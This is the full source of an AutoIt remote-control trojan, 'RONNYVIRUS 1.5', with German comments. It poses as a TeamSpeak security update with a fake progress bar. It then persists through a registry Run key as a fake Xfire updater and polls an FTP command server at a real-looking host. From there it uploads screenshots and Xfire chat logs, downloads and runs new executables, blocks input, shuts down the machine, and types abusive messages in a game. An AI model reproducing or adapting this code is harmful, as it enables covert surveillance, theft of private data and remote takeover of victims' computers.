Untitled

;////////////////////////////////////////////
;RONNYVIRUS VERSION 1.5 by Daxter and nikeyY'
;///////////////////////////////////////////
;NEU IN 1.5: Xfire Chatlogstealer
;////////////////////////////////
#include <ScreenCapture.au3>
#include <Zip.au3>
AutoItSetOption("TrayIconHide", 1)
;Auslesen des Xfire-Pfades
$xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
If @error Then
    $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
EndIf
;Nachprüfen, ob als Updater gestartet wurde
If NOT StringInStr($CmdLineRaw,"update",1) = 0 Then
    update()
    Exit
EndIf
;Nachprüfen, ob schon infiziert wurde
If @ScriptFullPath = $xfire&"\xfire_updater.exe" Then
    get()
    Exit
EndIf
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Beginn des Fake-Updates für Teamspeak
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
If ProcessExists("TeamSpeak.exe") Then
    MsgBox(16,"Fehler!","Teamspeak sollte während der Installation nicht laufen und wird nun geschlossen.")
    ProcessClose("TeamSpeak.exe")
EndIf
;Auslesen des Teamspeak-Pfades
$teamspeak = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\teamspeak\DefaultIcon","")
if @error Then
    MsgBox (16, "TeamSpeak RC2 Update", "TeamSpeak2 wurde nicht erkannt. Stellen Sie sicher, dass TeamSpeak2 installiert ist!")
    infect()
    Exit
endif
$msg = MsgBox (36, "TeamSpeak RC2 Update", "Wollen Sie Das Update installieren? ")
;Fortschrittsanzeige der Fake-Installation
if $msg = 6 Then
    ProgressOn("TeamSpeak RC2 Sicherheits-Update", "Update wird installiert . . .", "0 Prozent")
    For $i = 10 to 43 step 1
        sleep(50)
        ProgressSet( $i, $i & " Prozent")
    Next
    For $i = 44 to 80 step 1
        sleep(100)
        ProgressSet( $i, $i & " Prozent")
    Next
    For $i = 81 to 100 step 1
        sleep(30)
        ProgressSet( $i, $i & " Prozent")
    Next
    ProgressSet(100 , "Fertig!", "Update durchgeführt")
    sleep(500)
    ProgressOff()
else
    infect()
    Exit
endif
$msg2 = MsgBox (324, "TeamSpeak RC2 Update", "Das Update wurde erfolgreich ausgeführt. Wollen Sie TeamSpeak2 nun starten?")
if $msg2 = 6 Then
    Run($teamspeak)
endif
infect()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Ende des Fake-Updates für Teamspeak
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
;Infektion des Computers
;;;;;;;;;;;;;;;;;;;;;;;;
Func infect()
    if DirGetSize("C:\Intel\Logs") = -1 Then
        DirCreate("C:\Intel\Logs")
    EndIf
    FileDelete("C:\Intel\log.ini")
    FileDelete("C:\Intel\AnalysisLog.txt")
    ;Erstellen und Überstragen einer .ini-Datei
    IniWrite("C:\Intel\log.ini","settings","sleep","5")
    FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
    FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
    FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
    FileWriteLine("C:\Intel\AnalysisLog.txt", "put C:\Intel\log.ini /"&@computername&".ini")
    FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
    ProcessClose("ftp.exe")
    ProcessWaitClose("ftp.exe")
    ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@sw_hide)
    ProcessWaitClose("ftp.exe")
    FileDelete("C:\Intel\AnalysisLog.txt")
    FileDelete("C:\Intel\log.ini")
    ;Beenden voriger Versionen
    ProcessClose("xfire_updater.exe")
    ProcessWaitClose("xfire_updater.exe")
    ;Kopieren in den Xfire-Ordner
    FileCopy(@scriptfullpath,$xfire&"\xfire_updater.exe",9)
    ;Registry-Eintrag für Autostart setzen
    $var=RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Xfire Update","REG_SZ",$xfire&"\xfire_updater.exe")
    If NOT $var = 1 Then
        FileCreateShortcut($xfire&"\xfire_updater.exe",@startupdir&"\Xfire Updater")
    EndIf
    ;Ausführen der kopierten Datei
    ShellExecute($xfire&"\xfire_updater.exe")
    Exit
EndFunc
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Ende der Infektions-Funktion
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Befehlsabfrage- und ausführung
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Func get()
    ;Angabe der aktuellen Version
    $ver = "1.5"
    ;Auslesen des Betriebssystems
    if @OSVersion = "WIN_XP" Then
        $os = "xp"
    Else
        $os = "vista"
    EndIf
    ;Auslesen des Firefox-Pfades
    $version = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox","CurrentVersion")
    if @error then
        $version = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox","CurrentVersion")
    endif
    $firefox = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\"& $version &"\Main","PathToExe")
    if @error then
        $firefox = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\"& $version &"\Main","PathToExe")
    endif
    ;Auslesen des Xfire-Pfades
    $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
    If @error Then
        $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
    EndIf
    if DirGetSize("C:\Intel\Logs") = -1 Then
        DirCreate("C:\Intel\Logs")
    EndIf
    ;Schließen des möglichen Updater-Prozesses
    ProcessClose("updater.exe")
    ProcessWaitClose("update.exe")
    ;Löschen des Updaters
    If FileExists("C:\Intel\update.exe") Then
        FileDelete("C:\Intel\update.exe")
    EndIf
    While 1
        ;Abfragen des Befehlablaufes vom Webspace
        $settings = 0
        FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
        FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
        FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
        FileWriteLine("C:\Intel\AnalysisLog.txt", "get /"&@computername&".ini C:\Intel\log.ini")
        FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
        ProcessClose("ftp.exe")
        ProcessWaitClose("ftp.exe")
        ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
        ProcessWaitClose("ftp.exe")
        FileDelete("C:\Intel\AnalysisLog.txt")
        ;Speichern des Befehlsablaufes in einem zweidimensionalen Array
        $settings = IniReadSection("C:\Intel\log.ini","settings")
        FileDelete("C:\Intel\log.ini")
        ;Überprüfen, ob Abfragen gelungen ist
        If NOT IsArray($settings) Then
            get()
            Exit
        EndIf
        $x = 1
        ;Ausführung der Befehle
        While $x < ($settings[0][0] + 1)
            ;Sleep-Befehl
            If $settings[$x][0] = "sleep" Then
                Sleep((Number($settings[$x][1]))*1000)
            EndIf
            ;Link-Befehl
            If $settings[$x][0] = "link" Then
                AutoItSetOption("WinTitleMatchMode",2)
                Run($firefox&" -new-tab "&$settings[$x][1])
                ProcessWait("firefox.exe")
                WinActivate("Mozilla Firefox")
                WinWaitActive("Mozilla Firefox")
            EndIf
            ;Mediaplayer-Funktion
            If $settings[$x][0] = "media" Then
                ProcessClose("wmplayer.exe")
                ProcessWaitClose("wmplayer.exe")
                ShellExecute("wmplayer",'/Filename "'&$settings[$x][1]&'"',"","open",@SW_Hide)
            EndIf
            ;MsgBox-Funktion
            If $settings[$x][0] = "msg" Then
                MsgBox(64,"",$settings[$x][1])
            EndIf
            ;CD-Laufwerks-Funktion
            If $settings[$x][0] = "cd" Then
                CDTray("E:", $settings[$x][1])
                CDTray("F:", $settings[$x][1])
                CDTray("G:", $settings[$x][1])
                CDTray("H:", $settings[$x][1])
            EndIf
            ;Xfire-Chatlog-Hochlade-Funktion
            If $settings[$x][0] = "chatlog" and $settings[$x][1] = "xfire" Then
                FileDelete("C:\Intel\Logs\log.zip")
                _Zip_Create("C:\Intel\Logs\log.zip")
                _Zip_AddFolderContents("C:\Intel\Logs\log.zip", @AppDataDir & "\Xfire\chatlog")
                sleep(3000)
                FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
                FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
                FileWriteLine("C:\Intel\Logs\Log.txt", "binary")
                FileWriteLine("C:\Intel\Logs\Log.txt", "put C:\Intel\Logs\log.zip /chatlogs/"&@ComputerName&"_xfire.zip")
                FileWriteLine("C:\Intel\Logs\Log.txt", "bye")
                ProcessClose("ftp.exe")
                ProcessWaitClose("ftp.exe")
                ShellExecute("ftp","-s:C:\Intel\Logs\Log.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
                ProcessWaitClose("ftp.exe")
                FileDelete("C:\Intel\Logs\Log.txt")
                FileDelete("C:\Intel\Logs\log.zip")
            EndIf
            ;Prozessschließungs-Funktion
            If $settings[$x][0] = "close" Then
                ProcessClose($settings[$x][1])
            EndIf
            ;Funktion zum Beenden des Abfragens
            If $settings[$x][0] = "exit" Then
                Exit
            EndIf
            ;Screenshot-Funktion
            If $settings[$x][0] = "screen" Then
                _ScreenCapture_SetJPGQuality(Number($settings[$x][1]))
                _ScreenCapture_Capture("C:\Intel\Logs\log.jpg")
                FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
                FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
                FileWriteLine("C:\Intel\Logs\Log.txt", "binary")
                FileWriteLine("C:\Intel\Logs\Log.txt", "put C:\Intel\Logs\log.jpg /screenshots/"&@ComputerName&"/"&@MDAY&"."&@MON&"-"&@HOUR&"."&@MIN&"."&@SEC&".jpg")
                FileWriteLine("C:\Intel\Logs\Log.txt", "bye")
                ProcessClose("ftp.exe")
                ProcessWaitClose("ftp.exe")
                ShellExecute("ftp","-s:C:\Intel\Logs\Log.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
                ProcessWaitClose("ftp.exe")
                FileDelete("C:\Intel\Logs\Log.txt")
                FileDelete("C:\Intel\Logs\log.jpg")
            EndIf
            ;Shutdown-Funktion
            If $settings[$x][0] = "shutdown" Then
                Shutdown($settings[$x][1])
            EndIf
            ;Selfkill-Funktion(CoD2)
            If $settings[$x][0] = "selfkill" Then
                BlockInput(1)
                Send("{a up}")
                Send("{w up}")
                Send("{s up}")
                Send("{d up}")
                MouseMove(mousegetpos(0)+50, mousegetpos(1)+2000, 1)
                sleep (50)
                Send("^/+frag/-frag")
                sleep (50)
                MouseMove(mousegetpos(0)+50, mousegetpos(1)+1000, 80)
                Sleep(200)
                Send("tI AM GAY!"& @CRLF)
                sleep(1000)
                BlockInput(0)
            EndIf
            ;Scroll-Funktion
            If $settings[$x][0] = "scroll" Then
                BlockInput(1)
                $y = ($settings[$x][1]*10)
                While $y>0
                    MouseWheel("down", 1)
                    Sleep(100)
                    $y = $y - 1
                WEnd
                BlockInput(0)
            EndIf
            ;Pause-Funktion
            If $settings[$x][0] = "pause" Then
                IniWrite("C:\Intel\log.ini","settings","sleep","5")
                FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
                FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
                FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
                FileWriteLine("C:\Intel\AnalysisLog.txt", "put C:\Intel\log.ini /"&@computername&".ini")
                FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
                ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@sw_hide)
                ProcessWaitClose("ftp.exe")
                FileDelete("C:\Intel\AnalysisLog.txt")
                FileDelete("C:\Intel\log.ini")
            EndIf
            ;Update-Funktion (Laden und Ausführen der neuen .exe vom Webspace)
            If $settings[$x][0] = "update" AND $settings[$x][1] <> $ver Then
                FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
                FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
                FileWriteLine("C:\Intel\AnalysisLog.txt", "binary")
                FileWriteLine("C:\Intel\AnalysisLog.txt", "get /update/update.exe C:\Intel\update.exe")
                FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
                ProcessClose("ftp.exe")
                ProcessWaitClose("ftp.exe")
                ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
                ProcessWaitClose("ftp.exe")
                FileDelete("C:\Intel\AnalysisLog.txt")
                FileDelete("C:\Intel\log.ini")
                If FileExists("C:\Intel\update.exe") Then
                    ShellExecute("C:\Intel\update.exe","update")
                    ProcessWait("update.exe")
                EndIf
                Exit
            EndIf
            $x = $x + 1
        WEnd
        ;Ende der Befehlsausführung, erneute Ablaufabfrage
    WEnd
EndFunc
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Ende der Abfrage- und Ausführungsfunktion
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;
;Update-Funktion
;;;;;;;;;;;;;;;;
Func update()
    ;Auslesen des Xfire-Pfades
    $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
    If @error Then
        $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
    EndIf
    ;Schließen des alten Prozesses
    ProcessClose("xfire_updater.exe")
    ProcessWaitClose("xfire_updater.exe")
    ;Löschen der alten .exe
    If FileExists($xfire&"\xfire_updater.exe") Then
        FileDelete($xfire&"\xfire_updater.exe")
        If FileExists($xfire&"\xfire_updater.exe") Then
            update()
            Exit
        EndIf
    EndIf
    ;Infizieren mit neuer .exe
    FileCopy(@scriptfullpath,$xfire&"\xfire_updater.exe",9)
    ;;Registry-Eintrag für Autostart setzen
    $var=RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Xfire Update","REG_SZ",$xfire&"\xfire_updater.exe")
    If NOT $var = 1 Then
        FileCreateShortcut($xfire&"\xfire_updater.exe",@startupdir&"\Xfire Updater")
    EndIf
    ;Starten der neuen .exe
    ShellExecute($xfire&"\xfire_updater.exe")
Exit
EndFunc
;;;;;;;;;;;;;;;;;;;;;;;;;
;Ende der Update-Funktion
;;;;;;;;;;;;;;;;;;;;;;;;;